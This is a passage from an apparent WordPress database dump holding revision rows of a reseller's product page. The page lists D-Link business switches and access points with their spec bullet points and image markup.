<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:27:42','2019-09-25 06:27:42','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3397,1,'2019-09-25 14:28:35','2019-09-25 06:28:35','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:28:35','2019-09-25 06:28:35','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3405,1,'2019-09-25 14:33:51','2019-09-25 06:33:51','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience 